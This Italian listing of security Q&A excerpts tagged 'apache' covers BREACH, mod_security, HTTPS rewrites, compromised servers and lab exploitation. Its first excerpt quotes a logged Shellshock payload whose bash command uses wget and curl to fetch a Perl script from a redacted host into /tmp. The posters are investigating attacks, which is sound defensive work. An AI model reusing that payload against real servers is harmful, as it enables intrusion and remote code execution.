Domande con tag 'apache'

domande con tag
1
risposta

Shellshock Exploit evidence: è un attacco riuscito

Stavo controllando i log oggi e ho notato quanto segue: 62.219.116.107 - - [26/Dec/2016:15:16:08 -0100] "GET / HTTP/1.0" 200 13501 "-" "() { :;}; /bin/bash -c \"wget http://[redacted]/bo.pl -O /tmp/bo.pl;curl -o /tmp/bo.pl http://[redacted]/b...
posta 27.12.2016 - 02:36
1
risposta

Stato attuale di BREAK (GZIP SSL Attack)?

È passato un anno da quando BREACH ci ha fatto strada nei nostri cuori, e da allora non sembrano esserci articoli o post o patch, il mio indebolimento di Google è diminuito? BREACH è stato mitigato o aggiornato in Apache / nginx? Possiamo...
posta 15.08.2014 - 12:07
3
risposte

Puoi dire se esiste una pagina anche se lancia un 404?

È possibile determinare che una pagina esiste effettivamente quando è progettata per lanciare un 404 NOT FOUND ? Sul mio server, quando viene fatta una richiesta ad uno script mentre si superano parametri non validi, sto lanciando un codi...
posta 27.01.2017 - 23:12
5
risposte

Argomento della tesi di laurea - mod_security

Da tempo gioco con mod_security e mi piacerebbe in qualche modo utilizzarlo nella mia tesi di laurea. Non so esattamente come questo lavoro potrebbe essere più interessante della descrizione di ciò che fa mod_security, che tipo di attacchi web p...
posta 21.01.2011 - 22:02
3
risposte

È una riscrittura forzata da http a https secure? Cosa aggiunge SSLRequireSSL?

Ho letto in contraddizione i consigli su come forzare le connessioni https nel modo seguente: RewriteEngine On RewriteCond %{HTTPS} off RewriteRule (.*) https://%{HTTP_HOST}%{REQUEST_URI} A me sembra che questo non permetterebbe a nessuno d...
posta 19.10.2012 - 00:48
2
risposte

Penso che il mio sito sia stato violato. Qualcuno può spiegare la spazzatura "GET / HTTP / 1.0" nel mio log di Apache e cosa sta facendo?

Si veda sotto la voce del log dall'hack, ho decodificato il codice base_64 e alla fine alcuni file vengono rilasciati sul server e una lista di directory diventa disponibile tra le altre sottigliezze! Qualcuno potrebbe spiegare quale debolezz...
posta 14.03.2016 - 22:15
2
risposte

Escalation dalla shell di Apache alla root

Ho una domanda noob. Ho provato a sfruttare shellshock sul mio server Linux Slackware, ma dopo essermi connesso con reverse shell e User Agent ottengo che sono un utente apache e l'utente apache non ha troppi privilegi, quindi penso che non ci s...
posta 27.09.2014 - 15:42
4
risposte

Iniezione javascript estesa al server

AGGIORNAMENTO: il server è stato rootato, php.ini è stato sostituito che fa apparire l'iniezione. Non ho ancora capito quale direttiva stia iniettando il javascript. Sto risolvendo un sito web compromesso in cui viene iniettato un javascript...
posta 17.11.2011 - 08:22
2
risposte

Fornire un webshell php senza eseguirlo localmente

Sto usando Kali Linux in un laboratorio di pentesting. Inserendo il seguente URL sul sistema della vittima posso ottenere l'accesso al mio server Apache (vedo una risposta di 200 accessi nei miei registri), ma il file php viene visualizzato s...
posta 23.12.2016 - 21:09
2
risposte

Permessi daemon e Webroot HTTP

Abbiamo uno sviluppatore web con contratto che utilizza script di distribuzione per aggiornare e distribuire siti Web. Per farli funzionare, richiedono l'accesso in scrittura all'intero webroot tramite l'utente httpd. Ho provato a convincerli...
posta 01.08.2012 - 00:30